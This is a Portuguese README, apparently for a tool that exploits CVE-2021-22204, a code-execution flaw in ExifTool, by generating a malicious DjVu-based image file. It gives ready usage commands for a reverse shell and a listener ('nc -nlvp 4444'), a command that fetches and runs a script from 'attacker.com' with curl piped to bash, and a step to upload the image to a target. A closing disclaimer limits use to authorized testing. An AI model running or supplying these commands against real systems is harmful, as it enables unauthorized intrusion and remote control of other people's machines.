
Exploit de RCE no ExifTool (CVE-2021-22204) - versão melhorada, sem dependência do exiftool
Um exploit aprimorado para CVE-2021-22204, uma vulnerabilidade nas versões 7.44 a 12.23 do ExifTool que permite execução de código arbitrário ao processar arquivos DjVu maliciosos.
A neutralização inadequada de dados do usuário no formato de arquivo DjVu nas versões 7.44 a 12.23 do ExifTool permite a execução de código arbitrário ao analisar uma imagem maliciosa. Este exploit gera um arquivo de imagem malicioso que, quando processado por uma versão vulnerável do ExifTool, executa código controlado pelo atacante.
Esta é uma versão atualizada inspirada em UNICORDev/exploit-CVE-2021-22204, com as seguintes melhorias:
exiftool -config para incorporar o payload, o que falha se seu ExifTool estiver corrigido (v12.24+). Esta versão cria um payload DjVu puro usando apenas djvumake.\c)djvulibre-binsudo apt install djvulibre-bin
Shell Reverso:
python3 exploit.py -s <LHOST> <LPORT>
Comando Personalizado:
python3 exploit.py -c "id > /tmp/pwned"
Exemplos:
# Gerar payload de shell reverso
python3 exploit.py -s 192.168.1.100 4444
# Gerar payload de execução de comando
python3 exploit.py -c "curl http://attacker.com/shell.sh | bash"
# Iniciar listener e aguardar callback
nc -nlvp 4444
O exploit gera image.jpg - faça upload disso para um destino onde o ExifTool irá processá-lo.
Esta ferramenta é fornecida apenas para fins educacionais e de teste de segurança autorizados.
O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta. Use este exploit apenas contra sistemas que você possui ou para os quais tenha permissão explícita por escrito para testar.
O acesso não autorizado a sistemas de computador é ilegal e punível por lei. Use com responsabilidade.
Licença MIT - Veja o arquivo LICENSE.